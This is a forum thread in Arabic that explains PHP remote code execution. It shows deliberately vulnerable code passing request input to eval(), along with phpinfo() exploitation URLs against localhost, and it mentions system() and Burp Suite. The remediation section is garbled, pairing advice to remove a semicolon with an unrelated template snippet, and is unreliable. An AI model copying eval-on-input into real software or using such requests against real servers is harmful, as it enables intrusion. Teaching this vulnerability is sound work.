W3lc0m3 Fighter.




XBlackEGWhat is Remote Code Execution (RCE) ?

XBlackEG Offline
#1
Brick 
السلام عليكم ورحمه الله وبركاته
 owasp هنتكلم اليوم عن ثغره خطيره تعد من اخطر 10 ثغرات حسب
What is Remote Code Execution (RCE) ? 

ثغره ريموت عباره عن تنفيذ امر عن بعد في البروزر او في الريكويست بتاعك اولا ناخد مثال للداله المصابه بالاستدعاء
Exmple مثال: 
Code:
<?php
$code=$_GET['code'];
eval($code);
?>

ودي بدورها بتنفذ الكود او الريكويست اللي انت بعته evalمش متفلتر وممكن اي قيمه او ريكويست هيروح للداله ايفل code نلاحظ ان متغير 

تعالو نشوف ازاي هيتم الاستغلال test  مثلا الكود داخل ملف باسم 

Code:
http://127.0.0.1/test.php?code=phpinfo()

PHPالاستغلال نجح وهيكون الريسبونس او الرد بمعلومات البي اتش بي

ناخد مثال لكود كمان مصاب بثغره ريموت
Code:
$conf = array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if ( $_SERVER['HTTP_CLIENT_IP'] )

طبعا الداله مش هتفيد كتير الا لو عملنا لها انكلود لعنوان او موقع معين والاستغلال هيكون كده مثلا stripslashes في الكود ده المبرمج عمل داله 

Code:
http://127.0.0.1/test.php?anticode=phpinfo()

لتنفيذ الاوامر system وفي الكود ده ممكن نستخدم داله 

burp suite وهنا بيكون الاستغلال عن طريق 
[Image: 158794351966141.png]

Code:
{@if cond="'{device}' == 'desktop'"}
  <div> Desktop version </div>
{:else}
  <div> Mobile version </div>
{/if}


طب ازاي نرقع الثغره دي او ايه ابسط حل ليها ؟ 
How Fix it this vulnerability rce ?

بكل بساطه تقدر تشيل 
Code:
;

لان النوع الخطير من الثغرات مش بيتم الا باضافتها من غير فلتره المدخلات 

اتمني اكون قربت لكم الفكره
:RpS_cool:
Reply

isaaccuenca Offline
#2
تسلم يغااااااالي
Reply



Possibly Related Threads…
04-27-2020, 02:34 AM
Last Post: XBlackEG
04-09-2020, 10:44 PM
Last Post: Mr.Ban



Users browsing this thread:
3 Guest(s)



ABOUT Team of the X-fighter

All Right Reserved © Xp10.site